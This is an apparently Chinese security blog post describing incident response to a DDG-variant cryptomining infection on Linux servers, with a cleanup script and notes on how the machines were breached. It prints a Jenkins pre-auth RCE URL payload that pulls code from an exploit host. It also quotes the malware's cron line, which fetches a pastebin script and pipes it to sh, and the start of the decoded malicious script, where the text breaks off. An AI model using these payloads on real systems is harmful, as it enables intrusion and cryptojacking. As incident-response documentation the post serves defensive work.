<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<script>
    (function(){
        if(''){
            if (prompt('请输入文章密码') !== ''){
                alert('密码错误！');
                history.back();
            }
        }
    })();
</script>



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="linux,应急响应,Redis,Jenkins,Nexus," />





  <link rel="alternate" href="/atom.xml" title="瓦都剋" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.1" />






<meta name="description" content="背景春节刚过，黑产团队就开始了新的一年的工作。21日晚上九点多，正准备回家享受快乐时光呢，钉钉就响了，客户应急来了，8台机器感染挖矿木马病毒。根据今天看的默安科技发的文章说是”Linux DDG变种挖矿病毒”，挖矿病毒这两年也处理了不少了，但是这次的应急受益匪浅，值得记录一下。 0x00 事件处理过程0x01 传播途径此次事件从网上收集了下，途径不止有被通报的Redis，  Jenkins RCE">
<meta name="keywords" content="linux,应急响应,Redis,Jenkins,Nexus">
<meta property="og:type" content="article">
<meta property="og:title" content="关于Linux下变种DDG挖矿应急处理总结">
<meta property="og:url" content="http://byd.dropsec.xyz/2019/02/22/关于Linux下变种DDG挖矿应急处理总结/index.html">
<meta property="og:site_name" content="瓦都剋">
<meta property="og:description" content="背景春节刚过，黑产团队就开始了新的一年的工作。21日晚上九点多，正准备回家享受快乐时光呢，钉钉就响了，客户应急来了，8台机器感染挖矿木马病毒。根据今天看的默安科技发的文章说是”Linux DDG变种挖矿病毒”，挖矿病毒这两年也处理了不少了，但是这次的应急受益匪浅，值得记录一下。 0x00 事件处理过程0x01 传播途径此次事件从网上收集了下，途径不止有被通报的Redis，  Jenkins RCE">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://blog.w2n1ck.com/nexus-1.png">
<meta property="og:image" content="http://blog.w2n1ck.com/nexus-2.png">
<meta property="og:updated_time" content="2019-02-25T01:51:47.636Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="关于Linux下变种DDG挖矿应急处理总结">
<meta name="twitter:description" content="背景春节刚过，黑产团队就开始了新的一年的工作。21日晚上九点多，正准备回家享受快乐时光呢，钉钉就响了，客户应急来了，8台机器感染挖矿木马病毒。根据今天看的默安科技发的文章说是”Linux DDG变种挖矿病毒”，挖矿病毒这两年也处理了不少了，但是这次的应急受益匪浅，值得记录一下。 0x00 事件处理过程0x01 传播途径此次事件从网上收集了下，途径不止有被通报的Redis，  Jenkins RCE">
<meta name="twitter:image" content="http://blog.w2n1ck.com/nexus-1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"hide","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"输入关键词进行搜索","hits_empty":"找不到关于“${query}”的文章","hits_stats":"共找到 ${hits} 篇文化在那个，花了 ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://byd.dropsec.xyz/2019/02/22/关于Linux下变种DDG挖矿应急处理总结/"/>





  <title>关于Linux下变种DDG挖矿应急处理总结 | 瓦都剋</title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?61c879c1c104a92aab1d6e4b6888ffe5";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>











  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">瓦都剋</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Looking at yourself from a different Angle!</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-weixin">
          <a href="/wx" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            menu.weixin
          </a>
        </li>
      
        
        <li class="menu-item menu-item-daohang">
          <a href="/daohang" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-globe"></i> <br />
            
            导航
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://byd.dropsec.xyz/2019/02/22/关于Linux下变种DDG挖矿应急处理总结/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="瓦都剋">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="瓦都剋">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">关于Linux下变种DDG挖矿应急处理总结</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-02-22T09:10:33+08:00">
                2019-02-22
              </time>
            

            

            
          </span>

          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2019/02/22/关于Linux下变种DDG挖矿应急处理总结/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count disqus-comment-count"
                        data-disqus-identifier="2019/02/22/关于Linux下变种DDG挖矿应急处理总结/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计</span>
                
                <span title="字数统计">
                  2,282
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长</span>
                
                <span title="阅读时长">
                  11
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="背景"><a href="#背景" class="headerlink" title="背景"></a>背景</h2><p>春节刚过，黑产团队就开始了新的一年的工作。21日晚上九点多，正准备回家享受快乐时光呢，钉钉就响了，客户应急来了，8台机器感染挖矿木马病毒。根据今天看的默安科技发的文章说是”Linux DDG变种挖矿病毒”，挖矿病毒这两年也处理了不少了，但是这次的应急受益匪浅，值得记录一下。</p>
<h2 id="0x00-事件处理过程"><a href="#0x00-事件处理过程" class="headerlink" title="0x00 事件处理过程"></a>0x00 事件处理过程</h2><h2 id="0x01-传播途径"><a href="#0x01-传播途径" class="headerlink" title="0x01 传播途径"></a>0x01 传播途径</h2><p>此次事件从网上收集了下，途径不止有被通报的Redis，</p>
<ul>
<li>Jenkins RCE 漏洞</li>
<li>Nexus RCE 漏洞</li>
<li>Redis未授权访问or弱口令</li>
</ul>
<p>然后被感染后受害者会尝试进行对外或内网SSH爆破、Redis探测并入侵</p>
<h2 id="0x02-处理流程"><a href="#0x02-处理流程" class="headerlink" title="0x02 处理流程"></a>0x02 处理流程</h2><h3 id="获取busybox"><a href="#获取busybox" class="headerlink" title="获取busybox"></a>获取busybox</h3><p>为什么要获取busybox？这就是此次事件的特别之处，如果你使用top、ps等系统命令是看不到挖矿进程的，因为挖矿病毒修改了系统的动态链接库配置文件<code>/etc/ld.so.preload</code>内容并引用了<code>/usr/local/lib/libioset.so</code>，所以有些运维人员开始top、ps等未查找到异常进程是由于该病毒涉及到 Linux动态链接库预加载机制，是一种常用的进程隐藏方法，而系统的ls，ps等命令已被通过so库的preload机制被病毒劫持, ls会导致/etc/cron.d/root文件被刷写为病毒定时执行命令。</p>
<p>而busybox是静态编译的，不依赖于系统的动态链接库，从而不受<code>ld.so.preload</code>的劫持，能够正常操作文件。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">cd <span class="regexp">/bin/</span></div><div class="line">wget https:<span class="regexp">//</span>busybox.net<span class="regexp">/downloads/</span>binaries<span class="regexp">/1.30.0-i686/</span>busybox</div><div class="line">chmod <span class="number">755</span> busybox</div></pre></td></tr></table></figure>
<p>PS: 这里跟客户学到个命令，这条命令也是可以显示恶意进程的，有兴趣的可以查查。</p>
<figure class="highlight coq"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">perf <span class="built_in">top</span> -s pid,comm,dso,symbol</div></pre></td></tr></table></figure>
<h3 id="病毒文件"><a href="#病毒文件" class="headerlink" title="病毒文件"></a>病毒文件</h3><figure class="highlight awk"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="regexp">/tmp/</span>ksoftirqds</div><div class="line"><span class="regexp">/tmp/</span>watchdogs</div></pre></td></tr></table></figure>
<h3 id="关闭crontab"><a href="#关闭crontab" class="headerlink" title="关闭crontab"></a>关闭crontab</h3><figure class="highlight arduino"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">service crond <span class="built_in">stop</span></div><div class="line">systemctl <span class="built_in">stop</span> crond</div></pre></td></tr></table></figure>
<h3 id="修改hosts"><a href="#修改hosts" class="headerlink" title="修改hosts"></a>修改hosts</h3><p>修改<code>/etc/hosts</code>来屏蔽病毒脚本下载，域名为解密sh文件之后出现的两个域名。</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">busybox echo -e <span class="string">"\n0.0.0.0 pastebin.com\n0.0.0.0 thyrsi.com"</span> <span class="meta">&gt;&gt; </span>/etc/hosts</div></pre></td></tr></table></figure>
<h3 id="删除，创建，并锁定-crontab相关文件"><a href="#删除，创建，并锁定-crontab相关文件" class="headerlink" title="删除，创建，并锁定 crontab相关文件"></a>删除，创建，并锁定 crontab相关文件</h3><p>使用<code>chattr</code>加<code>i</code>属性来防止文件被修改，查看具有哪些属性使用<code>lsattr</code></p>
<figure class="highlight groovy"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">busybox rm <span class="regexp">/var/</span>spool<span class="regexp">/cron/</span>root &amp;&amp; busybox touch <span class="regexp">/var/</span>spool<span class="regexp">/cron/</span>root &amp;&amp; busybox chattr +i  <span class="regexp">/var/</span>spool<span class="regexp">/cron/</span>root</div><div class="line">busybox rm <span class="regexp">/var/</span>spool<span class="regexp">/cron/</span>crontabs<span class="regexp">/root &amp;&amp; busybox touch /</span>var<span class="regexp">/spool/</span>cron<span class="regexp">/crontabs/</span>root &amp;&amp; busybox chattr +i <span class="regexp">/var/</span>spool<span class="regexp">/cron/</span>crontabs/root </div><div class="line">busybox rm <span class="regexp">/etc/</span>cron.d<span class="regexp">/root &amp;&amp; busybox touch /</span>etc<span class="regexp">/cron.d/</span>root &amp;&amp; busybox chattr +i <span class="regexp">/etc/</span>cron.d/root</div></pre></td></tr></table></figure>
<h3 id="备份重要的crontab，然后删除cron-d目录的其他文件"><a href="#备份重要的crontab，然后删除cron-d目录的其他文件" class="headerlink" title="备份重要的crontab，然后删除cron.d目录的其他文件"></a>备份重要的crontab，然后删除cron.d目录的其他文件</h3><figure class="highlight armasm"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">busybox </span>rm -f /etc/cron.d<span class="comment">/*</span></div></pre></td></tr></table></figure>
<h3 id="检查并删除下面目录是否有异常文件"><a href="#检查并删除下面目录是否有异常文件" class="headerlink" title="检查并删除下面目录是否有异常文件"></a>检查并删除下面目录是否有异常文件</h3><figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">busybox <span class="keyword">ls</span> -al <span class="string">/etc/cron.daily</span></div><div class="line">busybox <span class="keyword">ls</span> -al <span class="string">/etc/cron.hourly</span>  </div><div class="line">busybox <span class="keyword">ls</span> -al <span class="string">/etc/cron.monthly</span> </div><div class="line">busybox <span class="keyword">ls</span> -al <span class="string">/etc/cron.weekly</span></div></pre></td></tr></table></figure>
<h3 id="删除病毒相关执行文件和启动脚本"><a href="#删除病毒相关执行文件和启动脚本" class="headerlink" title="删除病毒相关执行文件和启动脚本"></a>删除病毒相关执行文件和启动脚本</h3><figure class="highlight sqf"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">busybox <span class="built_in">find</span> / -<span class="built_in">type</span> f -<span class="built_in">name</span> <span class="string">'*watchdogs*'</span> | busybox xargs rm -f</div></pre></td></tr></table></figure>
<h3 id="删除病毒进程"><a href="#删除病毒进程" class="headerlink" title="删除病毒进程"></a>删除病毒进程</h3><figure class="highlight perl"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">busybox pkill watchdogs</div><div class="line">busybox pkill ksoftirqds</div><div class="line">也可以使用：</div><div class="line">busybox ps -ef | busybox <span class="keyword">grep</span> -v <span class="keyword">grep</span> | busybox egrep <span class="string">'ksoftirqds'</span> | busybox awk <span class="string">'&#123;print $1&#125;'</span> | busybox xargs <span class="keyword">kill</span> -<span class="number">9</span></div><div class="line">busybox ps -ef | busybox <span class="keyword">grep</span> -v <span class="keyword">grep</span> | busybox egrep <span class="string">'watchdogs'</span> | busybox awk <span class="string">'&#123;print $1&#125;'</span> | busybox xargs <span class="keyword">kill</span> -<span class="number">9</span></div></pre></td></tr></table></figure>
<h3 id="删除被preload的so库"><a href="#删除被preload的so库" class="headerlink" title="删除被preload的so库"></a>删除被preload的so库</h3><figure class="highlight crystal"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">busybox rm -f /usr/local/<span class="class"><span class="keyword">lib</span>/<span class="title">libioset</span>.<span class="title">so</span></span></div><div class="line">busybox rm -f /etc/ld.so.preload</div><div class="line">busybox rm -f /etc/ld.so.cache</div></pre></td></tr></table></figure>
<h3 id="验证libioset-so被卸载"><a href="#验证libioset-so被卸载" class="headerlink" title="验证libioset.so被卸载"></a>验证libioset.so被卸载</h3><figure class="highlight crystal"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">lsof |grep usr/local/<span class="class"><span class="keyword">lib</span>/<span class="title">libioset</span>.<span class="title">so</span></span></div><div class="line">echo $LD_PRELOAD</div></pre></td></tr></table></figure>
<p>若结果为空， 则该动态链接库被卸载;</p>
<p>若有输出，kill掉占用的进程，重复执行该步骤;</p>
<p>若反复执行后无法成功卸载该动态链接库，请执行服务重启操作。</p>
<h3 id="一键清理脚本"><a href="#一键清理脚本" class="headerlink" title="一键清理脚本"></a>一键清理脚本</h3><p>默安科技也发了一个一键清理脚本，在此基础上，自己改了改。</p>
<figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># wget http://www.w2n1ck.com/clear.sh</span></div><div class="line"></div><div class="line"><span class="comment">#!/bin/sh</span></div><div class="line"><span class="comment">#LANG=zh_CN.UTF-8</span></div><div class="line"></div><div class="line"><span class="comment"># 关闭crontab</span></div><div class="line">service crond stop</div><div class="line">systemctl stop crond</div><div class="line"></div><div class="line"><span class="comment"># 写hosts, 屏蔽病毒脚本下载</span></div><div class="line">busybox <span class="keyword">echo</span> -e <span class="string">"\n0.0.0.0 pastebin.com\n0.0.0.0 thyrsi.com"</span> &gt;&gt; <span class="string">/etc/hosts</span></div><div class="line"></div><div class="line"><span class="comment"># 删除，创建，并锁定 crontab相关文件</span></div><div class="line">busybox rm <span class="string">/var/spool/cron/root</span> &amp;&amp; busybox touch <span class="string">/var/spool/cron/root</span> &amp;&amp; busybox chattr +i  <span class="string">/var/spool/cron/root</span></div><div class="line">busybox rm <span class="string">/var/spool/cron/crontabs/root</span> &amp;&amp; busybox touch <span class="string">/var/spool/cron/crontabs/root</span> &amp;&amp; busybox chattr +i <span class="string">/var/spool/cron/crontabs/root</span> </div><div class="line">busybox rm <span class="string">/etc/cron.d/root</span> &amp;&amp; busybox touch <span class="string">/etc/cron.d/root</span> &amp;&amp; busybox chattr +i <span class="string">/etc/cron.d/root</span></div><div class="line"></div><div class="line"><span class="comment"># 删除cron.d目录的其他文件</span></div><div class="line">busybox rm <span class="string">/etc/cron.d/</span>*</div><div class="line"></div><div class="line"><span class="comment"># 删除病毒相关执行文件和启动脚</span></div><div class="line">busybox find / -type f -name '*watchdogs*'|busybox xargs rm -f</div><div class="line"></div><div class="line"><span class="comment"># 删除病毒进程</span></div><div class="line">busybox pkill watchdogs</div><div class="line">busybox pkill ksoftirqds</div><div class="line"></div><div class="line"><span class="comment"># 删除被preload的so库</span></div><div class="line">chattr -i <span class="string">/etc/ld.so.preload</span></div><div class="line">chattr -i <span class="string">/usr/local/lib/libioset.so</span></div><div class="line">busybox rm -f <span class="string">/usr/local/lib/libioset.so</span></div><div class="line">busybox rm -f <span class="string">/etc/ld.so.preload</span></div><div class="line">busybox rm -f <span class="string">/etc/ld.so.cache</span></div><div class="line"></div><div class="line"><span class="comment"># 验证libioset.so被卸载</span></div><div class="line"><span class="comment"># lsof |grep /usr/local/lib/libioset.so</span></div><div class="line"><span class="comment"># 无输出, 则该动态链接库被卸载, 直接执行验证步骤; 有输出, kill掉占用的进程, ,重复执行该步骤;</span></div><div class="line"></div><div class="line"></div><div class="line"><span class="comment"># 再次清理异常进程</span></div><div class="line">busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '&#123;print $1&#125;' | busybox xargs kill -9</div><div class="line">busybox ps -ef | busybox grep -v grep | busybox egrep 'watchdogs' | busybox awk '&#123;print $1&#125;' | busybox xargs kill -9</div><div class="line"></div><div class="line"><span class="comment"># 清理异常文件</span></div><div class="line">busybox rm -f <span class="string">/tmp/watchdogs</span></div><div class="line">busybox rm -f <span class="string">/etc/cron.d/tomcat</span></div><div class="line">busybox rm -f <span class="string">/etc/cron.d/root</span></div><div class="line">busybox rm -f <span class="string">/var/spool/cron/root</span></div><div class="line">busybox rm -f <span class="string">/var/spool/cron/crontabs/root</span></div><div class="line">busybox rm -f <span class="string">/etc/rc.d/init.d/watchdogs</span></div><div class="line">busybox rm -f <span class="string">/usr/sbin/watchdogs</span></div><div class="line"></div><div class="line"><span class="comment"># 搜索可共享的动态链接库</span></div><div class="line">ldconfig</div><div class="line"></div><div class="line"><span class="comment"># 清理开机启动项</span></div><div class="line">chkconfig watchdogs off</div><div class="line">chkconfig <span class="params">--del</span> watchdogs</div><div class="line"></div><div class="line">service crond start</div><div class="line"><span class="keyword">echo</span> <span class="string">"Done, Please reboot!"</span></div></pre></td></tr></table></figure>
<h2 id="0x03-事件总结"><a href="#0x03-事件总结" class="headerlink" title="0x03 事件总结"></a>0x03 事件总结</h2><p>此次事件客户有9台服务器被感染，其中主要的一台是我们拿到信息之后发现只开放了，Nginx-80和Jenkins-8080，然后就被误导了。。。</p>
<p>首先使用了<a href="https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc" target="_blank" rel="external">CVE-2019-1003000-jenkins-rce-poc</a>，但是这个漏洞是需要具有<code>Overall/Read”</code>权限的用户才能完成。然后想起来前两天Orange发了个PreAuth的</p>
<figure class="highlight crystal"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">Part <span class="number">1</span>: <span class="symbol">https:</span>/<span class="regexp">/blog.orange.tw/</span><span class="number">2019</span>/<span class="number">01</span>/hacking-jenkins-part-<span class="number">1</span>-play-<span class="keyword">with</span>-dynamic-routing.html</div><div class="line">Part <span class="number">2</span>: <span class="symbol">http:</span>/<span class="regexp">/blog.orange.tw/</span><span class="number">2019</span>/<span class="number">02</span>/abusing-meta-programming-<span class="keyword">for</span>-unauthenticated-rce.html</div></pre></td></tr></table></figure>
<p>POC：</p>
<figure class="highlight kotlin"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">https:<span class="comment">//github.com/petercunha/Jenkins-PreAuth-RCE-PoC</span></div><div class="line">URL Payload:</div><div class="line">http:<span class="comment">//&lt;TARGET HOST&gt;/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile</span></div><div class="line">?value=</div><div class="line"><span class="meta">@GrabConfig(disableChecksums=true)</span>%<span class="number">0</span>a</div><div class="line"><span class="meta">@GrabResolver(name=<span class="meta-string">'payload'</span>, root=<span class="meta-string">'http://&lt;EXPLOIT HOST&gt;'</span>)</span>%<span class="number">0</span>a</div><div class="line"><span class="meta">@Grab(group=<span class="meta-string">'package'</span>, module=<span class="meta-string">'payload'</span>, version=<span class="meta-string">'1'</span>)</span>%<span class="number">0</span>a</div><div class="line"><span class="keyword">import</span> Payload;</div></pre></td></tr></table></figure>
<p>但是我利用这个POC是可以打成功在shodan上的，但是没办法客户的无法成功，一度相当困惑。</p>
<p>后来看到异常文件：</p>
<p><img src="http://blog.w2n1ck.com/nexus-1.png" alt=""></p>
<p>然后想起来前两天RR大佬也爆了个Nexus的RCE，<a href="https://xz.aliyun.com/t/4136" target="_blank" rel="external">Nexus Repository Manager 3 RCE 分析 -【CVE-2019-7238】</a>，然后试了下，成功了</p>
<p><img src="http://blog.w2n1ck.com/nexus-2.png" alt=""></p>
<p>剩下的几台就是Redis未授权访问导致的了，具体可以参考：<a href="https://www.secpulse.com/archives/61101.html" target="_blank" rel="external">未授权访问漏洞总结</a></p>
<h4 id="彩蛋"><a href="#彩蛋" class="headerlink" title="彩蛋"></a>彩蛋</h4><p>这次应急让我意外的是恶意的下载的sh脚本</p>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">*/<span class="number">15</span> * * * * (curl -fsSL http<span class="variable">s:</span>//pastebin.<span class="keyword">com</span>/raw/sByq0rym||wget -q -O- http<span class="variable">s:</span>//pastebin.<span class="keyword">com</span>/raw/sByq0rym)|<span class="keyword">sh</span></div></pre></td></tr></table></figure>
<p><strong>访问之后base64解密看到之后相当惊喜：</strong></p>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">ps</span> auxf | <span class="keyword">grep</span> -v <span class="keyword">grep</span> | <span class="keyword">grep</span> hwlh3wlh44lh | awk <span class="string">'&#123;print $2&#125;'</span> | xargs kill -<span class="number">9</span></div><div class="line"><span class="keyword">ps</span> auxf | <span class="keyword">grep</span> -v <span class="keyword">grep</span> | <span class="keyword">grep</span> Circle_MI | awk <span class="string">'&#123;print $2&#125;'</span> | xargs kill -<span class="number">9</span></div><div class="line"><span class="keyword">ps</span> auxf | <span class="keyword">grep</span> -v <span class="keyword">grep</span> | <span class="keyword">grep</span> <span class="built_in">get</span>.bi-chi.<span class="keyword">com</span> | awk <span class="string">'&#123;print $2&#125;'</span> | xargs kill -<span class="number">9</span></div><div class="line"><span class="keyword">ps</span> auxf | <span class="keyword">grep</span> -v <span class="keyword">grep</span> | <span class="keyword">grep</span> hashvault.<span class="keyword">pro</span> | awk <span class="string">'&#123;print $2&#125;'</span> | xargs kill -<span class="number">9</span></div><div class="line"><span class="keyword">ps</span> auxf | <span class="keyword">grep</span> -v <span class="keyword">grep</span> | <span class="keyword">grep</span> nanopool.org | awk <span class="string">'&#123;print $2&#125;'</span> | xargs kill -<span class="number">9</span></div><div class="line"><span class="keyword">ps</span> auxf | <span class="keyword">grep</span> -v <span class="keyword">grep</span> | <span class="keyword">grep</span> /usr/bin/.sshd | awk <span class="string">'&#123;print $2&#125;'</span> | xargs kill -<span class="number">9</span></div><div class="line"><span class="keyword">ps</span> auxf | <span class="keyword">grep</span> -v <span class="keyword">grep</span> | <span class="keyword">grep</span> /usr/bin/bsd-port | awk <span class="string">'&#123;print $2&#125;'</span> | xargs kill -<span class="number">9</span></div><div class="line"><span class="keyword">ps</span> auxf|<span class="keyword">grep</span> -v <span class="keyword">grep</span>|<span class="keyword">grep</span> <span class="string">"xmr"</span> | awk <span class="string">'&#123;print $2&#125;'</span>|xargs kill -<span class="number">9</span></div><div class="line"><span class="keyword">ps</span> auxf|<span class="keyword">grep</span> -v <span class="keyword">grep</span>|<span class="keyword">grep</span> <span class="string">"xig"</span> | awk <span class="string">'&#123;print $2&#125;'</span>|xargs kill -<span class="number">9</span></div><div class="line"><span class="keyword">ps</span> auxf|<span class="keyword">grep</span> -v <span class="keyword">grep</span>|<span class="keyword">grep</span> <span class="string">"ddgs"</span> | awk <span class="string">'&#123;print $2&#125;'</span>|xargs kill -<span class="number">9</span></div><div class="line"><span class="keyword">ps</span> auxf|<span class="keyword">grep</span> -v <span class="keyword">grep</span>|<span class="keyword">grep</span> <span class="string">"qW3xT"</span> | awk <span class="string">'&#123;print $2&#125;'</span>|xargs kill -<span class="number">9</span></div><div class="line"><span class="keyword">ps</span> auxf|<span class="keyword">grep</span> -v <span 